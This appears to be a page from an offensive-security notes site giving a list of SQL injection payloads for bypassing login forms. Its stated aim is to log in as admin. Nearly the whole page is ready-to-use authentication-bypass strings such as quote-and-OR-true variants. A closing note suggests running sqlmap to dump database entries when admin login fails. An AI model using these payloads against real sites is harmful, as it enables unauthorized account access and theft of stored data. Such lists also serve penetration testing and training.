SQL Injection in Login forms

When it comes to login forms, we can try the following SQL payloads manually first in the username or password field or both together. The objective is to login as admin to the site

root' or 1=1##

' or 1=1-- -;

" OR "1"="1

' or 1=1 -- #

1' or '1'='1

' or 1=1;-- -

' or ''='

' or 1--

') or true--

" or true--

") or true--

')) or true—

admin")) -- -

Note: in some scenarios, the username or password field are injectable but doesn't necessarily lead to admin access. If you manage to find one of the login fields to be injectable but not able to login as admin, you can start sqlmap to leak information and dump database entries.

PreviousSQL Injection In The Search Field NextBoolean SQL Injection Blind

Last updated 12 months ago